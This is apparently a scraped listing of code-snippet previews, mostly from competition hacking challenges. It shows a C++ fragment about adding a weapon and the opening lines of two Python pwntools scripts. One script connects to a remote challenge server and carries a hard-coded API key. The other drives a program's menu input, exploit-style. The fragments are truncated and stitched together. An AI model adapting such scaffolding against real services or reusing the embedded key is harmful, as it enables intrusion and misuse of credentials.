virtual void add_weapon(string str){
if(weapon.empty()){
weapon = str ;
if(!weapon.compare("Droupnir")){
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from pwn import * | |
import json | |
from ctypes import * | |
REMOTE = 1 | |
if REMOTE == 1: | |
s = remote('report.eatpwnnosleep.com',55555) | |
a = { | |
'apikey' : "e54aa9929975face3253fb6e261f3a7c15701dface66a5a63ac2fdea555e745d", | |
} |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from pwn import * | |
def make(name,email,width,height,info,dat): | |
s.recvuntil('>') | |
s.sendline('1') | |
s.recvuntil('NAME>') | |
s.sendline(name) | |
s.recvuntil('EMAIL>') | |
s.sendline(email) | |
s.recvuntil('WIDTH>') | |
s.sendline(width) |
NewerOlder